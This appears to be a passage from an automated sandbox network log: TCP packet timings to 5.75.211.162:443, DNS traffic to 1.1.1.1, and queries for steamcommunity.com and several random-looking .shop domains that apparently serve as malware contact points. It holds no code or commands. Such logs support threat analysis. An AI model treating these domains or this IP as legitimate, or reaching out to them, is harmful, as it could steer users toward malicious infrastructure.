Sep 27, 2024 00:15:51.363040924 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.363106966 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.363112926 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.363153934 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.365171909 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.365195036 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.365261078 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.365271091 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.365313053 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.366688013 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.366707087 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.366767883 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.366774082 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.366816044 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.367106915 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.367124081 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.367182970 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.367188931 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.367225885 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.418946981 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.418976068 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.419035912 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.419051886 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.419061899 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.419095993 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.436217070 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.436248064 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.436300993 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.436312914 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.436383009 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.436383009 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.451484919 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.451512098 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.451575041 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.451582909 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.451654911 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.452852011 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.452873945 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.452924013 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.452929020 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.452944994 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.453377962 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.453924894 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.453950882 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.454005003 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.454013109 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.454022884 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.454054117 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.455940962 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.455962896 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.456007957 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.456012964 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.456023932 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.456051111 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.457390070 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.457422018 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.457463026 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.457468033 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.457480907 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.457511902 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.457863092 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.457889080 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.457932949 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.457937956 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.457983971 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.458013058 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.509785891 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.509815931 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.509874105 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.509893894 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.509902954 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.509939909 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.527003050 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.527029991 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.527086020 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.527093887 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.527120113 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.527129889 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.542455912 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.542490005 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.542536974 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.542543888 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.542562962 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.542573929 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.543452978 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.543479919 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.543529034 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.543534040 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.543565035 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.543584108 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.544608116 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.544629097 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.544688940 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.544693947 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.544713020 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.544732094 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.546724081 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.546746016 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.546809912 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.546816111 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.546849966 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.546869993 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.548515081 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.548541069 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.548599958 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.548605919 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.548641920 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.548666954 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.548962116 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.548981905 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.549026012 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.549030066 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.549078941 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.549093962 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.600733995 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.600766897 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.600910902 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.600924969 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.600970984 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.617769003 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.617800951 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.617852926 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.617858887 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.617897034 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.617913961 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.633289099 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.633315086 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.633452892 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.633460045 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.633513927 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.634241104 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.634265900 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.634330988 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.634336948 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.634378910 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.635298967 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.635317087 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.635369062 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.635374069 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.635421038 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.637597084 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.637619972 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.637677908 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.637684107 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.637725115 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.639534950 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.639554024 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.639601946 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.639606953 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.639636993 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.639655113 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.639911890 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.639928102 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.639970064 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.639975071 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.640002966 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.640017986 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.691659927 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.691687107 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.691759109 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.691766977 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.691824913 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.708569050 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.708592892 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.708674908 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.708681107 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.708724022 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.724323988 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.724347115 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.724386930 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.724392891 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.724431038 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.724931955 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.724951029 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.724993944 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.724999905 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.725025892 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.725065947 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.726339102 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.726360083 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.726461887 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.726468086 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.726509094 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.728908062 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.728933096 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.729011059 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.729017973 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.729059935 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.730905056 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.730927944 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.730989933 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.730995893 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.731023073 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.731041908 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.731298923 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.731314898 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.731394053 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.731394053 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.731401920 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.731487036 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.782407045 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.782433987 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.782541037 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.782553911 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.786843061 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.799443007 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.799468994 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.799545050 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.799551964 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.799583912 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.799601078 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.815371990 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.815402985 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.815488100 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.815514088 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.815526962 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.815989971 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.816010952 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.816065073 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.816071987 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.817409039 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.817430019 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.817487955 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.817496061 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.818339109 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.820636034 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.820652962 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.820710897 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.820715904 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.822329998 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.824570894 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.824585915 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.824649096 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.824655056 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.825539112 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.825557947 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.825628996 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.825634956 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.826277018 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.873152018 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.873172998 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.873320103 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.873332977 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.874639034 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.890471935 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.890500069 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.890631914 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.890641928 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.893393993 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.906294107 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.906321049 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.906393051 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.906409979 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.906419039 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.906443119 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.906457901 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.906482935 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.906688929 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.906795979 CEST	49793	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.906812906 CEST	443	49793	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.924812078 CEST	49794	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.924846888 CEST	443	49794	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:51.924933910 CEST	49794	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.925179958 CEST	49794	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:51.925194025 CEST	443	49794	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:52.774321079 CEST	443	49794	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:52.774427891 CEST	49794	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:52.777542114 CEST	49794	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:52.777570963 CEST	443	49794	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:52.779347897 CEST	49794	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:52.779366016 CEST	443	49794	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:52.779400110 CEST	49794	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:52.779407978 CEST	443	49794	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:53.110232115 CEST	49795	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:53.110272884 CEST	443	49795	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:53.110361099 CEST	49795	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:53.110748053 CEST	49795	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:53.110761881 CEST	443	49795	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:53.444502115 CEST	443	49794	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:53.444580078 CEST	443	49794	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:53.444653034 CEST	49794	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:53.444693089 CEST	49794	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:53.445724010 CEST	49794	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:53.445745945 CEST	443	49794	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:53.759429932 CEST	443	49795	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:53.759540081 CEST	49795	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:54.750027895 CEST	49795	443	192.168.2.4	5.75.211.162

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 00:14:26.224596977 CEST	56151	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:14:26.439091921 CEST	53	56151	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:07.166815996 CEST	52568	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:07.184736967 CEST	53	52568	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:08.163095951 CEST	51877	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:08.177232981 CEST	53	51877	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:09.100766897 CEST	62977	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:09.114937067 CEST	53	62977	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:10.038405895 CEST	56240	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:10.052309036 CEST	53	56240	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:11.287487984 CEST	49981	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:11.300513983 CEST	53	49981	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:12.494857073 CEST	64698	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:12.510329008 CEST	53	64698	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:13.448158979 CEST	63460	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:13.461260080 CEST	53	63460	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:14.396934032 CEST	51859	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:14.413163900 CEST	53	51859	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:14.516217947 CEST	55073	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:14.526509047 CEST	53	55073	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:16.207473993 CEST	65108	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:16.222239017 CEST	53	65108	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:18.172069073 CEST	50292	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:18.178950071 CEST	53	50292	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:19.553369999 CEST	51427	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:19.574954033 CEST	53	51427	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:30.626862049 CEST	49774	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:30.635106087 CEST	53	49774	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:35.007052898 CEST	52773	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:35.025650978 CEST	53	52773	1.1.1.1	192.168.2.4
Sep 27, 2024 00:15:39.390388966 CEST	64479	53	192.168.2.4	1.1.1.1
Sep 27, 2024 00:15:39.399322033 CEST	53	64479	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 00:14:26.224596977 CEST	192.168.2.4	1.1.1.1	0xfede	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:07.166815996 CEST	192.168.2.4	1.1.1.1	0xa62e	Standard query (0)	wallkedsleeoi.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:08.163095951 CEST	192.168.2.4	1.1.1.1	0x5b13	Standard query (0)	gutterydhowi.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:09.100766897 CEST	192.168.2.4	1.1.1.1	0x9409	Standard query (0)	ghostreedmnu.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:10.038405895 CEST	192.168.2.4	1.1.1.1	0x1e8c	Standard query (0)	offensivedzvju.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:11.287487984 CEST	192.168.2.4	1.1.1.1	0xb0ee	Standard query (0)	vozmeatillu.shop	A (IP address)	IN (0x0001)	false
